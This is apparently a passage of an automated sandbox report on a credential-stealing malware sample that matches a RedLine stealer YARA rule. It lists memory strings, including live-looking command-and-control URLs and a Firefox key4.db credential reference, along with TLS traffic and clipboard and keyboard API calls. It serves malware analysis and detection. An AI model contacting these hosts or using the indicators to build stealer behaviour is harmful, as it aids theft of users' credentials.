                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000002.4325422315.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000002.4325422315.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005599000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005451000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000002.4325422315.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000002.4325422315.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                            Source: powershell.exe, 00000009.00000002.2206410417.0000018B0022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: 28f48f066a.exe, 00000014.00000003.2777984663.0000000005DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                            Source: 28f48f066a.exe, 00000014.00000003.2777984663.0000000005DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                            Source: 28f48f066a.exe, 00000014.00000003.2733508030.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733006730.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733702466.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000003.4144155090.0000000009197000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4586075567.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585854936.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585699950.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp, tmp6E48.tmp.21.dr, tmpA5C7.tmp.21.dr, tmp6E27.tmp.21.dr, tmpA5F8.tmp.21.dr, tmp365C.tmp.21.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: powershell.exe, 00000009.00000002.2206410417.0000018B00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: powershell.exe, 00000006.00000002.2190451619.00000000050B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                            Source: 8c36d696e4.exe, 00000015.00000002.4325422315.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                            Source: 8c36d696e4.exe, 00000015.00000002.4319695523.0000000000B12000.00000040.00000001.01000000.00000012.sdmp, 8c36d696e4.exe, 00000015.00000003.3956964167.0000000005050000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                            Source: 8c36d696e4.exe, 00000015.00000002.4319695523.0000000000B12000.00000040.00000001.01000000.00000012.sdmp, 8c36d696e4.exe, 00000015.00000003.3956964167.0000000005050000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                            Source: 28f48f066a.exe, 00000014.00000003.2733508030.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733006730.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733702466.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000003.4144155090.0000000009197000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4586075567.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585854936.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585699950.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp, tmp6E48.tmp.21.dr, tmpA5C7.tmp.21.dr, tmp6E27.tmp.21.dr, tmpA5F8.tmp.21.dr, tmp365C.tmp.21.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: 28f48f066a.exe, 00000014.00000003.2733508030.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733006730.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733702466.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000003.4144155090.0000000009197000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4586075567.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585854936.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585699950.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp, tmp6E48.tmp.21.dr, tmpA5C7.tmp.21.dr, tmp6E27.tmp.21.dr, tmpA5F8.tmp.21.dr, tmp365C.tmp.21.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: 28f48f066a.exe, 00000014.00000003.2733508030.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733006730.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733702466.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000003.4144155090.0000000009197000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4586075567.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585854936.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585699950.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp, tmp6E48.tmp.21.dr, tmpA5C7.tmp.21.dr, tmp6E27.tmp.21.dr, tmpA5F8.tmp.21.dr, tmp365C.tmp.21.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: powershell.exe, 00000009.00000002.2263806135.0000018B101B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 00000009.00000002.2263806135.0000018B101B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 00000009.00000002.2263806135.0000018B101B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: 28f48f066a.exe, 00000014.00000003.2733508030.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733006730.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733702466.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000003.4144155090.0000000009197000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4586075567.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585854936.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585699950.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp, tmp6E48.tmp.21.dr, tmpA5C7.tmp.21.dr, tmp6E27.tmp.21.dr, tmpA5F8.tmp.21.dr, tmp365C.tmp.21.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: 28f48f066a.exe, 00000014.00000003.2733508030.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733006730.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733702466.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000003.4144155090.0000000009197000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4586075567.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585854936.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585699950.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp, tmp6E48.tmp.21.dr, tmpA5C7.tmp.21.dr, tmp6E27.tmp.21.dr, tmpA5F8.tmp.21.dr, tmp365C.tmp.21.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: 28f48f066a.exe, 00000014.00000003.2733508030.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733006730.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733702466.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000003.4144155090.0000000009197000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4586075567.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585854936.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585699950.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp, tmp6E48.tmp.21.dr, tmpA5C7.tmp.21.dr, tmp6E27.tmp.21.dr, tmpA5F8.tmp.21.dr, tmp365C.tmp.21.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: powershell.exe, 00000009.00000002.2206410417.0000018B0022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 00000006.00000002.2190451619.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2206410417.0000018B00C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                            Source: 8c36d696e4.exe, 00000015.00000002.4319695523.0000000000B12000.00000040.00000001.01000000.00000012.sdmp, 8c36d696e4.exe, 00000015.00000003.3956964167.0000000005050000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                            Source: powershell.exe, 00000006.00000002.2194818093.0000000006116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2263806135.0000018B1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2263806135.0000018B101B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: 28f48f066a.exe, 00000014.00000003.2795723529.0000000001622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/
                            Source: 28f48f066a.exe, 00000014.00000003.2777219754.0000000005D98000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2776860451.0000000005D95000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2777959974.0000000005D98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/((qf
                            Source: 28f48f066a.exe, 00000014.00000002.2856309543.0000000001623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/L
                            Source: 28f48f066a.exe, 00000014.00000003.2762412721.0000000005D8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/MMqf
                            Source: 28f48f066a.exe, 00000014.00000002.2855939481.000000000158B000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000002.2856309543.0000000001623000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2795723529.0000000001622000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2717731138.00000000015AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/api
                            Source: 28f48f066a.exe, 00000014.00000003.2854179213.000000000158B000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000002.2855939481.000000000158B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/api&
                            Source: 28f48f066a.exe, 00000014.00000003.2854179213.000000000158B000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000002.2855939481.000000000158B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/apiB
                            Source: 28f48f066a.exe, 00000014.00000003.2732201240.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000002.2856309543.0000000001623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/apiF
                            Source: 28f48f066a.exe, 00000014.00000003.2854179213.000000000158B000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000002.2855939481.000000000158B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/apik
                            Source: 28f48f066a.exe, 00000014.00000003.2732201240.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/apim
                            Source: 28f48f066a.exe, 00000014.00000002.2856309543.0000000001623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/d
                            Source: 28f48f066a.exe, 00000014.00000002.2856309543.0000000001623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/t
                            Source: 28f48f066a.exe, 00000014.00000003.2795723529.0000000001622000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2762279539.0000000005D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click:443/api
                            Source: 28f48f066a.exe, 00000014.00000002.2856309543.0000000001623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click:443/api.default-release/key4.dbPK
                            Source: 28f48f066a.exe, 00000014.00000003.2779212882.0000000005E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                            Source: 28f48f066a.exe, 00000014.00000003.2779212882.0000000005E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                            Source: 0dd40f41c4.exe, 00000017.00000003.4584825031.0000000000C0D000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4584422625.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000002.4596746260.0000000000C32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/
                            Source: 0dd40f41c4.exe, 00000017.00000003.4584422625.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000002.4596746260.0000000000C32000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000002.4596746260.0000000000C65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/api
                            Source: 0dd40f41c4.exe, 00000017.00000002.4596746260.0000000000BD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/api0
                            Source: 0dd40f41c4.exe, 00000017.00000003.4584825031.0000000000C0D000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4584422625.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/apiOR
                            Source: 0dd40f41c4.exe, 00000017.00000003.4584825031.0000000000C0D000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4584422625.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/d
                            Source: 0dd40f41c4.exe, 00000017.00000002.4613983118.0000000005A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org:443/api
                            Source: 0dd40f41c4.exe, 00000017.00000002.4596746260.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-la%90
                            Source: 28f48f066a.exe, 00000014.00000003.2717674363.0000000001613000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2732201240.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2717731138.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4584422625.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                            Source: 28f48f066a.exe, 00000014.00000003.2732201240.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-managecJc
                            Source: 28f48f066a.exe, 00000014.00000003.2717674363.0000000001613000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2718053678.0000000001611000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2717731138.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2717731138.00000000015DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                            Source: 28f48f066a.exe, 00000014.00000003.2733508030.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733006730.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733702466.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000003.4144155090.0000000009197000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4586075567.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585854936.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585699950.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp, tmp6E48.tmp.21.dr, tmpA5C7.tmp.21.dr, tmp6E27.tmp.21.dr, tmpA5F8.tmp.21.dr, tmp365C.tmp.21.drString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: 28f48f066a.exe, 00000014.00000003.2733508030.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733006730.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733702466.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, 8c36d696e4.exe, 00000015.00000003.4144155090.0000000009197000.00000004.00000020.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4586075567.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585854936.0000000005ADC000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4585699950.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp, tmp6E48.tmp.21.dr, tmpA5C7.tmp.21.dr, tmp6E27.tmp.21.dr, tmpA5F8.tmp.21.dr, tmp365C.tmp.21.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: 28f48f066a.exe, 00000014.00000003.2779137609.0000000005DBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                            Source: 28f48f066a.exe, 00000014.00000003.2779137609.0000000005DBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                            Source: 28f48f066a.exe, 00000014.00000003.2779212882.0000000005E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                            Source: 28f48f066a.exe, 00000014.00000003.2779212882.0000000005E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                            Source: 28f48f066a.exe, 00000014.00000003.2779212882.0000000005E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57273 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57279 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57340 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57277 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57271 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57269
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57368
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57365 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57369
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57367 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57375
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57277
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57376
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57371 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57377
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57279
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57371
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57273
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57372
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57274
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57373
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57374
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57375 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57266 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57271
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57370
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57373 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57377 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57274 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57362 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57366 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57368 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57369 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57370 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57266
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57365
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57267
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57366
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57367
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57340
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57362
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57267 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57269 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57372 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57374 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57376 -> 443
                            Source: unknownHTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.6:57266 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.6:57267 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.6:57269 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.6:57271 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.6:57273 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.6:57274 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.6:57277 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.6:57279 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57362 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57365 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57366 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57367 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57368 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57369 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57370 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57371 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57372 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57373 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57374 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57375 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57376 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57377 version: TLS 1.2
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0038EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0038EAFF
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0038ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0038ED6A
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0038EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0038EAFF
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0037AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0037AA57
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003A9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_003A9576

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 21.2.8c36d696e4.exe.b10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
